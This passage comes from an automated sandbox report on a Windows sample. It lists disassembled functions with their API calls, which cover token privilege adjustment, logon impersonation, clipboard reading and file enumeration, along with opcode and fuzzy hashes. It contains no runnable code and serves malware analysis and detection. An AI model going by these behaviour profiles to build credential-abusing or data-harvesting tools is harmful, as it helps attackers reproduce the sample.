                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AllocateHeap
                                                                  • String ID:
                                                                  • API String ID: 1279760036-0
                                                                  • Opcode ID: 64e880acabd64abfb096e5b5867691bdeab25fe5afc4b65e55a9e542e2201811
                                                                  • Instruction ID: ebacc752a78cba9c6783c16f98bd8a76a0e589ee26c18e3cb022a0a173c2c612
                                                                  • Opcode Fuzzy Hash: 64e880acabd64abfb096e5b5867691bdeab25fe5afc4b65e55a9e542e2201811
                                                                  • Instruction Fuzzy Hash: DAE0ED21200630A7DB612A769C01B9B3B4FAF21BE2F150525EC059A391DB70CE4885A4
                                                                  Function 006266E7 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5ffaf1d4c9fae17bdd406c87646e9dd853bca2f7fb96acb9c5f3610ebd3f57dc
                                                                  • Instruction ID: 6af99157fdf9baed3311599b0508952e69c6f4795f75b67adbee401d13db1b91
                                                                  • Opcode Fuzzy Hash: 5ffaf1d4c9fae17bdd406c87646e9dd853bca2f7fb96acb9c5f3610ebd3f57dc
                                                                  • Instruction Fuzzy Hash: 09F06DB1105B22CFCB349F64E8A0856BBF6BF143293248A3EF5D786620C7729880DF50
                                                                  Function 00676AD5 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: e3f0b0a743a70650880ab84259fab9f1056fb543a197d2ab9677f1d0305cc1dc
                                                                  • Instruction ID: 19629249646f494b8d7ad8007f4f30fdce2792a9be1991a1c454da208fd10065
                                                                  • Opcode Fuzzy Hash: e3f0b0a743a70650880ab84259fab9f1056fb543a197d2ab9677f1d0305cc1dc
                                                                  • Instruction Fuzzy Hash: FEF0E5B1708601AAE7304BA4D8057E1F7EAAB01315F10851EF4D9C7281D7B244D49B91
                                                                  Function 0062684A Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: __fread_nolock
                                                                  • String ID:
                                                                  • API String ID: 2638373210-0
                                                                  • Opcode ID: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                  • Instruction ID: ede9d3d98add757d1136287f476a948a4c94d02e438c67379d25b279ca73080d
                                                                  • Opcode Fuzzy Hash: dbc72fcbbe417d099125a5b7f0b477dbc50683e17be9c436dba593077d17b43b
                                                                  • Instruction Fuzzy Hash: 27F0F87550020DFFDF05DF90C941E9E7B7AFB04318F208449F9159A251C336EA21ABA1
                                                                  Function 00623907 Relevance: 1.5, APIs: 1, Instructions: 24windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • Shell_NotifyIconW.SHELL32(00000002,?), ref: 00623963
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: IconNotifyShell_
                                                                  • String ID:
                                                                  • API String ID: 1144537725-0
                                                                  • Opcode ID: 50575a14439c40fef608a4fc804ac38b27d421797ca1f72a61e447a68f35e3f3
                                                                  • Instruction ID: f27b34744c2519d24c72b56436c33c1abc662ece948b6b1fc42bc9a3e7e50917
                                                                  • Opcode Fuzzy Hash: 50575a14439c40fef608a4fc804ac38b27d421797ca1f72a61e447a68f35e3f3
                                                                  • Instruction Fuzzy Hash: 00F037B19143199FE752DF24DC45BD57FFDA701708F0011A9A64496281D7745B88CF91
                                                                  Function 00623A57 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00623A76
                                                                    • Part of subcall function 00628577: _wcslen.LIBCMT ref: 0062858A
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePath_wcslen
                                                                  • String ID:
                                                                  • API String ID: 541455249-0
                                                                  • Opcode ID: e337a212b95b93cf9f7179c79226f412953994e0fbebe2872b5ce87760634d21
                                                                  • Instruction ID: d66199b68f31a300cfcfada34435d44c8b30582e23506b2b29b7d08911c763e1
                                                                  • Opcode Fuzzy Hash: e337a212b95b93cf9f7179c79226f412953994e0fbebe2872b5ce87760634d21
                                                                  • Instruction Fuzzy Hash: FAE0CD769001245BC75092589C05FDA77DEDFC8790F044175FD05D7254D970DEC08594
                                                                  Function 0066071A Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • CreateFileW.KERNEL32(00000000,00000000,?,00660A84,?,?,00000000,?,00660A84,00000000,0000000C), ref: 00660737
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CreateFile
                                                                  • String ID:
                                                                  • API String ID: 823142352-0
                                                                  • Opcode ID: 76576a8fcc90b45c93a436d8063a6e3df18e0e7bc4b2e6aeb79ab6170d6ffb28
                                                                  • Instruction ID: a390773faa9e43ab8828cab5e323244ad3ff037696cc18c900be3db785f71798
                                                                  • Opcode Fuzzy Hash: 76576a8fcc90b45c93a436d8063a6e3df18e0e7bc4b2e6aeb79ab6170d6ffb28
                                                                  • Instruction Fuzzy Hash: 98D06C3204010DBBDF028F84DD06EDA3BAAFB48714F014100BE1866020C732E861AB90
                                                                  Function 0068EAB0 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?,0068D840), ref: 0068EAB1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: AttributesFile
                                                                  • String ID:
                                                                  • API String ID: 3188754299-0
                                                                  • Opcode ID: 723dcc803c717c1b3e055427a16b05d5ed9820bb5eba5dca4e0e720470ba4899
                                                                  • Instruction ID: 36f6c9d8da15a5ccb8d8883a305d0a5905a39908c822eecabe4435005db51498
                                                                  • Opcode Fuzzy Hash: 723dcc803c717c1b3e055427a16b05d5ed9820bb5eba5dca4e0e720470ba4899
                                                                  • Instruction Fuzzy Hash: 02B0926810060005AE2C2A385A299D933027842BE57DC2BC0E479892E1D33A884FBA50
                                                                  Function 0069664C Relevance: 1.3, APIs: 1, Instructions: 31COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0068DC54: FindFirstFileW.KERNEL32(?,?), ref: 0068DCCB
                                                                    • Part of subcall function 0068DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0068DD1B
                                                                    • Part of subcall function 0068DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0068DD2C
                                                                    • Part of subcall function 0068DC54: FindClose.KERNEL32(00000000), ref: 0068DD43
                                                                  • GetLastError.KERNEL32 ref: 0069666E
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                  • String ID:
                                                                  • API String ID: 2191629493-0
                                                                  • Opcode ID: 8d7cae28c77a46f54b000be9ac9f8c8458f28cfee7d3f3dcf14b7094e0ecaffa
                                                                  • Instruction ID: e35cbfa65f956db7222f55e2c1b917d7146422a98e2525b2648c670b8040255c
                                                                  • Opcode Fuzzy Hash: 8d7cae28c77a46f54b000be9ac9f8c8458f28cfee7d3f3dcf14b7094e0ecaffa
                                                                  • Instruction Fuzzy Hash: 41F05E362006104FCB50AF58D845B6AB7EAAF88320F04841DF9458B352CB70B8018B95

                                                                  Non-executed Functions

                                                                  Function 00681B4D Relevance: 40.5, APIs: 19, Strings: 4, Instructions: 241COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00682010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0068205A
                                                                    • Part of subcall function 00682010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00682087
                                                                    • Part of subcall function 00682010: GetLastError.KERNEL32 ref: 00682097
                                                                  • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00681BD2
                                                                  • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00681BF4
                                                                  • CloseHandle.KERNEL32(?), ref: 00681C05
                                                                  • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00681C1D
                                                                  • GetProcessWindowStation.USER32 ref: 00681C36
                                                                  • SetProcessWindowStation.USER32(00000000), ref: 00681C40
                                                                  • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00681C5C
                                                                    • Part of subcall function 00681A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00681B48), ref: 00681A20
                                                                    • Part of subcall function 00681A0B: CloseHandle.KERNEL32(?,?,00681B48), ref: 00681A35
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                  • String ID: $default$winsta0$jn
                                                                  • API String ID: 22674027-2256956720
                                                                  • Opcode ID: 72c8e3adedd2356f6f0b266e7f6b96bebcba9d8832a1a43d37c75d7778bd318f
                                                                  • Instruction ID: 4b398a56eefd00b9e47fbfd079efce95190c736f264fb6330e45c52f03f58bad
                                                                  • Opcode Fuzzy Hash: 72c8e3adedd2356f6f0b266e7f6b96bebcba9d8832a1a43d37c75d7778bd318f
                                                                  • Instruction Fuzzy Hash: CB8181B1900209AFDF11AFA4DC59FEE7BBEFF05304F144229F915AA2A0E7718946CB50
                                                                  Function 006814AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00681A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00681A60
                                                                    • Part of subcall function 00681A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A6C
                                                                    • Part of subcall function 00681A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A7B
                                                                    • Part of subcall function 00681A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,006814E7,?,?,?), ref: 00681A82
                                                                    • Part of subcall function 00681A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00681A99
                                                                  • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00681518
                                                                  • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0068154C
                                                                  • GetLengthSid.ADVAPI32(?), ref: 00681563
                                                                  • GetAce.ADVAPI32(?,00000000,?), ref: 0068159D
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 006815B9
                                                                  • GetLengthSid.ADVAPI32(?), ref: 006815D0
                                                                  • GetProcessHeap.KERNEL32(00000008,00000008), ref: 006815D8
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 006815DF
                                                                  • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00681600
                                                                  • CopySid.ADVAPI32(00000000), ref: 00681607
                                                                  • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00681636
                                                                  • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00681658
                                                                  • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0068166A
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00681691
                                                                  • HeapFree.KERNEL32(00000000), ref: 00681698
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006816A1
                                                                  • HeapFree.KERNEL32(00000000), ref: 006816A8
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000), ref: 006816B1
                                                                  • HeapFree.KERNEL32(00000000), ref: 006816B8
                                                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 006816C4
                                                                  • HeapFree.KERNEL32(00000000), ref: 006816CB
                                                                    • Part of subcall function 00681ADF: GetProcessHeap.KERNEL32(00000008,006814FD,?,00000000,?,006814FD,?), ref: 00681AED
                                                                    • Part of subcall function 00681ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,006814FD,?), ref: 00681AF4
                                                                    • Part of subcall function 00681ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,006814FD,?), ref: 00681B03
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                  • String ID:
                                                                  • API String ID: 4175595110-0
                                                                  • Opcode ID: dd792eb51ebd8707f052e36075922afe6ee56d85ff83884a9decad2ab30a2e96
                                                                  • Instruction ID: 959c82a7729dcce1c200c048efdb39591f70855044fbadd08fcf7c2ee6f36164
                                                                  • Opcode Fuzzy Hash: dd792eb51ebd8707f052e36075922afe6ee56d85ff83884a9decad2ab30a2e96
                                                                  • Instruction Fuzzy Hash: 68713DB190020ABBDF10EFA5DC44FEEBBBEBF05350F184615E955AA290E7319946CB60
                                                                  Function 0069F55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • OpenClipboard.USER32(006BDCD0), ref: 0069F586
                                                                  • IsClipboardFormatAvailable.USER32(0000000D), ref: 0069F594
                                                                  • GetClipboardData.USER32(0000000D), ref: 0069F5A0
                                                                  • CloseClipboard.USER32 ref: 0069F5AC
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0069F5E4
                                                                  • CloseClipboard.USER32 ref: 0069F5EE
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0069F619
                                                                  • IsClipboardFormatAvailable.USER32(00000001), ref: 0069F626
                                                                  • GetClipboardData.USER32(00000001), ref: 0069F62E
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0069F63F
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0069F67F
                                                                  • IsClipboardFormatAvailable.USER32(0000000F), ref: 0069F695
                                                                  • GetClipboardData.USER32(0000000F), ref: 0069F6A1
                                                                  • GlobalLock.KERNEL32(00000000), ref: 0069F6B2
                                                                  • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 0069F6D4
                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0069F6F1
                                                                  • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 0069F72F
                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 0069F750
                                                                  • CountClipboardFormats.USER32 ref: 0069F771
                                                                  • CloseClipboard.USER32 ref: 0069F7B6
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                  • String ID:
                                                                  • API String ID: 420908878-0
                                                                  • Opcode ID: 08c124fdb05864a1eed270cc4c643125354c11a45084972d72c291095d96d4e5
                                                                  • Instruction ID: 84efdc17d28971d0b5533013b84354208dc09045b117f3fb7dde599b4a940f24
                                                                  • Opcode Fuzzy Hash: 08c124fdb05864a1eed270cc4c643125354c11a45084972d72c291095d96d4e5
                                                                  • Instruction Fuzzy Hash: 0061C275204301AFD700EF24E884FAAB7AAEF84714F15456DF446CB6A2EB31ED85CB61
                                                                  Function 006973D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00697403
                                                                  • FindClose.KERNEL32(00000000), ref: 00697457
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00697493
                                                                  • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006974BA
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 006974F7
                                                                  • FileTimeToSystemTime.KERNEL32(?,?), ref: 00697524
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                  • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                  • API String ID: 3830820486-3289030164
                                                                  • Opcode ID: 3113f8ada024aaf4aa16a19edce21154c85a350898dc7d4ea3c0611b6427074c
                                                                  • Instruction ID: 4c24a93a3a7131e58e99612d75832bf738893fcb9cd4e099ba81ba79213fd678
                                                                  • Opcode Fuzzy Hash: 3113f8ada024aaf4aa16a19edce21154c85a350898dc7d4ea3c0611b6427074c
                                                                  • Instruction Fuzzy Hash: E2D17072908754AEC740EB64D841EABB7EDAF88704F44492DF585C7292EB34DA44CBA2
                                                                  Function 0069A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 0069A0A8
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 0069A0E6
                                                                  • SetFileAttributesW.KERNEL32(?,?), ref: 0069A100
                                                                  • FindNextFileW.KERNEL32(00000000,?), ref: 0069A118
                                                                  • FindClose.KERNEL32(00000000), ref: 0069A123
                                                                  • FindFirstFileW.KERNEL32(*.*,?), ref: 0069A13F
                                                                  • SetCurrentDirectoryW.KERNEL32(?), ref: 0069A18F
                                                                  • SetCurrentDirectoryW.KERNEL32(006E7B94), ref: 0069A1AD
                                                                  • FindNextFileW.KERNEL32(00000000,00000010), ref: 0069A1B7
                                                                  • FindClose.KERNEL32(00000000), ref: 0069A1C4
                                                                  • FindClose.KERNEL32(00000000), ref: 0069A1D4
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                  • String ID: *.*
                                                                  • API String ID: 1409584000-438819550
                                                                  • Opcode ID: 87c23cb0d3b3ed468bb49191c0343c953d9997ad85bfb5aa46272f66cde47d97
                                                                  • Instruction ID: 3874ce938e912be88763421cc10b9b3db2faab45a120eb29a71fbe1f43078244
                                                                  • Opcode Fuzzy Hash: 87c23cb0d3b3ed468bb49191c0343c953d9997ad85bfb5aa46272f66cde47d97
                                                                  • Instruction Fuzzy Hash: AA3113726002496BDF14AFF4DC4AAEE77EFAF05360F0001A5E915E6190EB70DE858BA5
                                                                  Function 00694763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00694785
